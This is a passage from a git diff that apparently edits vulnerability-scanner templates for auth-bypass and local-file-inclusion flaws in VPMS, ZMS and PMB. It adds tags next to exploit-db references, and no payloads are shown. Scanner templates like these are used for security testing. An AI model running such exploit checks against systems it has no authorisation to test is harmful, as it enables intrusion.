severity: high reference: https://www.exploit-db.com/exploits/49054 + tags: lfi,pmb requests: - method: GET diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml index d0dcd358f6..6f612b4f78 100644 --- a/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/vulnerabilities/other/vpms-auth-bypass.yaml @@ -5,7 +5,7 @@ info: author: dwisiswant0 severity: high reference: https://www.exploit-db.com/exploits/48877 - + tags: auth-bypass requests: - raw: - | diff --git a/vulnerabilities/other/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml index fbc1e03821..65c7df9984 100644 --- a/vulnerabilities/other/zms-auth-bypass.yaml +++ b/vulnerabilities/other/zms-auth-bypass.yaml @@ -5,6 +5,7 @@ info: author: dwisiswant0 severity: high reference: https://www.exploit-db.com/exploits/48880 + tags: auth-bypass,zms requests: - raw: